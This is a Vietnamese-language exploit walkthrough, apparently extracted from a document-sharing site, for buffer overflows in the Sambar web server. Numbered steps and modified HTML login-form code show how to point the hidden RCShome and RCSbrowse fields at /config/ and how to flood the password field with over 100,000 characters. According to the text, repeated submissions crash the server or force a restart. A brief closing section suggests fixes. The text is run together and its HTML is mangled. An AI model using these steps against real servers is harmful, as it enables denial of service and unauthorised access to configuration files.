Lỗi tràn bộ đệm của Server Sambar

Lỗi tràn bộ đệm của Server Sambar : CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c:sambar ) của form đăng nhập sysuser: BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như http://localhost/sysuser/index.stm. BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành something.html . BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server. CODE [FORM METHOD=POST...
Nội dung trích xuất từ tài liệu:
Lỗi tràn bộ đệm của Server SambarLỗi tràn bộ đệm của Server Sambar :CÁCH KHAI THÁC:Bạn phải biết được đường dẫn (ở sambar là c:sambar ) của form đăng nhập sysuser:BƯỚC 1: đ i tới đường dẫn của form đăng nhập sysuser, nhưhttp://localhost/sysuser/index.stm.BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và renamethành something.html .BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này choform và images , tất nhiên, form phải được connect đến đúng đ ịa chỉ url của script server.CODE[FORM METHOD=POST ACTION=http://localhost/session/loginonsubmit=return FormValidator(this)][INPUT TYPE=hidden NAME=RCpageVALUE=http://localhost/sysuser/desktop.stm]*This is your desktop installation.[INPUT TYPE=hidden NAME=onfailureVALUE=http://localhost/sysuser/relogin.stm]*bạn có thể thay đổi cái này để làm tăng việc trànbộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS)[INPUT TYPE=hidden NAME=start VALUE=1>[INPUT TYPE=hidden NAME=RCSdesktop VALUE=true][INPUT TYPE=hidden NAME=RCSsort VALUE=desc][INPUT TYPE=hidden NAME=RCSstyle VALUE=txtconvert][INPUT TYPE=hidden NAME=RCSwrap VALUE=60][INPUT TYPE=hidden NAME=RCScount VALUE=25][INPUT TYPE=hidden NAME=RCSfolder VALUE=inbox][INPUT TYPE=hidden NAME=RCSpath VALUE=/][INPUT TYPE=hidden NAME=RCShome VALUE=/config/] *Đây là vấn đề*[INPUT TYPE=hidden NAME=RCSbrowse VALUE=/config/]*Đây là vấn đề*[INPUT TYPE=hidden NAME=RCSsortby VALUE=name]BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốnchứng tỏ một lỗi nữa ở bước 6!BƯỚC 5: bây bạn phải nhấn submit, chờ, và nếu bạn chạy server trên máy của bạn thì server setrở nên dễ bị đ ổ, nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trongsuốt quá trình tấn công!.BƯỚC 6: lỗi thứ hai là trà n bộ đệm ở vùng mật khẩu, bạn có thể chèn vào hơn 1 triệu ký tự vàsubmit nó nhưng phải edit đoạn mã này trên máy của bạn:CODE[INPUT TYPE=PASSWORD NAME=RCpwd VALUE= MAXLENGTH=40]< thay đổi cái nàythành...[INPUT TYPE=PASSWORD NAME=RCpwd VALUE=đặt text của bạn ở đây, nhớ là hơn 100000ký tự]và..........BƯỚC 7: nhấn submit và server... !GIẢI PHÁP:- Thay đổi đường dẫn và thư mục của file liên quan đến user ở server sambar!- Những ngư ời phát triển server sambar có thể thay đ ổi code va p hát triển một module để kiểmtra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET.